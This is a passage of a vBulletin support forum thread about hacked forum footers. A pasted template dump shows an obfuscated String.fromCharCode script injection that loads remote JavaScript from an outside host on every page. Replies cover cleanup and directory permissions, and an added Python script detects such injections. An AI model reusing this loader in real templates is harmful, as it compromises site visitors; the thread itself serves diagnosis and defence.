         {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'),(20304, -1'footer''$final_rendered = '''' . ''''; if (!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])) {\n                    $final_rendered .= ''\r\n<div style="clear: '' . vB_Template_Runtime::fetchStylevar("left") . ''">\r\n  '' . $ad_location[''ad_footer_start''] . ''\r\n  '' . $ad_location[''global_above_footer''] . ''\r\n</div>\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="'' . 
vB_Template_Runtime::linkBuild("forumhome|nosession") . ''" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        '' . ''''; if ($show[''quickchooser'']) {\n                    $final_rendered .= ''\r\n            <select name="styleid" onchange="switch_id(this, \\''style\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_style_chooser") . ''">\r\n                    '' . $quickchooserbits . ''\r\n                </optgroup>\r\n            </select>    \r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        \r\n        '' . ''''; if ($show[''languagechooser'']) {\n                    $final_rendered .= ''\r\n            <select name="langid" onchange="switch_id(this, \\''lang\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_language_chooser") . ''">\r\n                    '' . $languagechooserbits . ''\r\n                </optgroup>\r\n            </select>\r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        '' . ''''; if ($show[''contactus'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''contactuslink''] . ''" rel="nofollow" accesskey="9">'' . vB_Template_Runtime::parsePhrase("contact_us") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''hometitle'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''homeurl''] . ''">'' . $vboptions[''hometitle''] . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . 
''''; if ($show[''admincplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $admincpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("admin") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''modcplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $modcpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("mod") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''archiveenabled'']) {\n                    $final_rendered .= ''<li><a href="archive/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("archive") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . $template_hook[''footer_links''] . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''privacyurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''privacyurl''] . ''">'' . vB_Template_Runtime::parsePhrase("privacy_statement") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''tosurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''tosurl''] . ''">'' . vB_Template_Runtime::parsePhrase("terms_of_service") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        <li><a href="'' . $relpath . ''#top" onclick="document.location.hash=\\''top\\''; return false;">'' . vB_Template_Runtime::parsePhrase("top") . ''</a></li>\r\n    </ul>\r\n    \r\n    \r\n    '' . 
''''; if ($show[''dst_correction'']) {\n                    $final_rendered .= ''\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="'' . $session[''sessionhash''] . ''" />\r\n            <input type="hidden" name="securitytoken" value="'' . $bbuserinfo[''securitytoken''] . ''" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = '' . $bbuserinfo[''timezoneoffset''] . '' + '' . $bbuserinfo[''dstonoff''] . '';\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . 
''\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();\r\n    //-->\r\n    </script>\r\n        '' . $template_hook[''footer_javascript''] . ''\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">'' . vB_Template_Runtime::parsePhrase("all_times_are_gmt_x_time_now_is_y") . ''</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    '' . vB_Template_Runtime::parsePhrase("powered_by_vbulletin") . ''\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $cronimage . ''\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $vboptions[''copyrighttext''] . ''\r\n</div>\r\n'' . $ad_location[''ad_footer_end''] . '' \r\n'' . 
''''; if ($GLOBALS[''vbulletin'']->options[''enablefacebookconnect'']) {\n                    $final_rendered .= ''\r\n    '' . $facebook_footer . ''\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n</div>'';''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if 
condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing 
div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'); 
                MusicaDigitale.net - Italian Biggest Computer Music Board

                Comment

                • Jacqueline
                  Member
                  • Mar 2005
                  • 70
                  • 3.7.x

                  #9
                  I saw the same issue. Creating a new template got rid of it. This also got me all the latest vbulletin template customizations. I just had to go in and tweak my header and footer, and reset the stylevar for my custom logo. So the site itself is fine, but that code is still hidden somewhere. I have searched the template, the database, and copied all files from the site to a local machine and searched for the hacked code - cannot find it anywhere.
                  ~ Jacqueline

                  Baby Talk Zone

                  Comment

                  • Lynne
                    Former vBulletin Support
                    • Oct 2004
                    • 26255

                    #10
                    The hackers usually enter it into the 'template' field. The field that gets dumped to the xml file, and the field that you are shown to edit, is the 'template_un' field (the unrendered version of the template). So, saving the template ('template_un') will actually write over the contents of the 'template' field and fix the issue.

                    Please don't PM or VM me for support - I only help out in the threads.
                    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                    Want help modifying your vbulletin forum? Head on over to vbulletin.org
                    If I post CSS and you don't know where it goes, throw it into the additional.css template.

                    W3Schools <- awesome site for html/css help

                    Comment
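An added example (not part of the thread and not vBulletin code) of the check post #10 implies: compare each template's compiled 'template' field with its editable 'template_un' source, and flag script behaviour that exists only in the compiled copy, after decoding `String.fromCharCode` obfuscation. The `(title, template, template_un)` row shape, the indicator list and the sample rows are assumptions made for this illustration; the sample URL is a constructed placeholder.

```python
import re

# String.fromCharCode(115,99,...) calls: the obfuscation seen in the injected footer.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")

# Script behaviour to look for once the character codes are decoded.
INDICATORS = {
    "dynamic_script": re.compile(r"createElement\(\s*\\?['\"]script\\?['\"]\s*\)", re.I),
    "dom_append": re.compile(r"\.appendChild\("),
    "remote_url": re.compile(r"https?://[^\s'\"<>\\]+", re.I),
}


def decode_charcodes(text):
    """Replace every String.fromCharCode(...) call with the quoted string it builds."""
    def build(match):
        # Drop whitespace first so codes split by hard line wraps ("1\n15") rejoin.
        codes = re.sub(r"\s+", "", match.group(1)).split(",")
        return '"' + "".join(chr(int(c) & 0xFFFF) for c in codes if c) + '"'
    return CHARCODE_CALL.sub(build, text)


def indicator_counts(text):
    """Count each indicator in the decoded text, plus the raw obfuscation calls."""
    decoded = decode_charcodes(text)
    counts = {name: len(rx.findall(decoded)) for name, rx in INDICATORS.items()}
    counts["charcode_obfuscation"] = len(CHARCODE_CALL.findall(text))
    return counts


def audit_templates(rows):
    """rows: iterable of (title, template, template_un) tuples.

    Flags templates whose compiled 'template' field shows script behaviour that
    the editable 'template_un' source does not account for.
    """
    findings = []
    for title, compiled, source in rows:
        have, expected = indicator_counts(compiled), indicator_counts(source)
        extra = sorted(name for name in have if have[name] > expected[name])
        if not extra:
            continue
        url_rx = INDICATORS["remote_url"]
        urls = set(url_rx.findall(decode_charcodes(compiled)))
        urls -= set(url_rx.findall(decode_charcodes(source)))
        findings.append({"title": title, "indicators": extra, "urls": sorted(urls)})
    return findings


def _cc(s):
    """Encode a string the way the injection does (used only to build sample data)."""
    return "String.fromCharCode(" + ",".join(str(ord(ch)) for ch in s) + ")"


# Constructed sample rows; the URL is a placeholder, not the one from the thread.
_INJECTED = (
    "var script=document.createElement(" + _cc("script") + ");"
    "script.src=" + _cc("http://injected.example.invalid/x.js") + ";"
    "var head=document.getElementsByTagName(" + _cc("head") + ")[0];"
    "head.appendChild(script);"
)
SAMPLE_ROWS = [
    ("footer",
     "$final_rendered = '<script>\n// Main vBulletin Javascript Initialization\n"
     + _INJECTED + "vBulletin_init();\n</script>';",
     "<script>\n// Main vBulletin Javascript Initialization\nvBulletin_init();\n</script>"),
    ("header",
     "$final_rendered = '<div id=\"header\">' . $navbar . '</div>';",
     "<div id=\"header\">{vb:raw navbar}</div>"),
]

if __name__ == "__main__":
    for finding in audit_templates(SAMPLE_ROWS):
        print(finding["title"], finding["indicators"], finding["urls"])
```

A template flagged here is one to open and re-save, as described in post #10, so the compiled field is rebuilt from the clean source.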

                    • Jacqueline
                      Member
                      • Mar 2005
                      • 70
                      • 3.7.x

                      #11
                      Thank you, thank you! I opened the footer and saved. That got rid of the hack code. While I'm staying on the new template, I feel better with the bad code outta there.
                      ~ Jacqueline

                      Baby Talk Zone

                      Comment

                      • Joey805
                        Senior Member
                        • Jan 2004
                        • 183

                        #12
                        My site is also hacked with the same code. How did they get it and what is the best way to clean this up as well as prevent it from happening again?

                        Comment

                        • Ace
                          Senior Member
                          • Apr 2004
                          • 4051
                          • 4.2.X

                          #13
                          Originally posted by Joey805
                          My site is also hacked with the same code. How did they get it and what is the best way to clean this up as well as prevent it from happening again?
                          They could have gotten in from several ways. Do you happen to have 0777 directories? Like: customavatars etc?

                          Have you made sure those directories are protected by .htaccess so people can't upload a dodgy file disguised as a non-dodgy one?

                          Have you followed all of the suggestions made here? https://www.vbulletin.com/forum/entr...orums-(Part-1)
                          My Live vB5 Site - NZEating.com
                          vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                          Comment

                          • Joey805
                            Senior Member
                            • Jan 2004
                            • 183

                            #14
                            Originally posted by Ace
                            They could have gotten in from several ways. Do you happen to have 0777 directories? Like: customavatars etc?

                            Have you made sure those directories are protected by .htaccess so people can't upload a dodgy file disguised as a non-dodgy one?

                            Have you followed all of the suggestions made here? https://www.vbulletin.com/forum/entry.php/2503-Securing-your-vBulletin-Forums-(Part-1)
                            Yes I have 777 directories for my avatars and attachments since they are stored in the file system. How do I properly secure these?

                            Comment

                            • stonepilot
                              Senior Member
                              • Apr 2006
                              • 195
                              • 4.1.x

                              #15
                              I hear people saying not to have 777 directories like the customavatar, etc. What are they supposed to be? 755?
                              Life is just a Big Skid

                              Comment
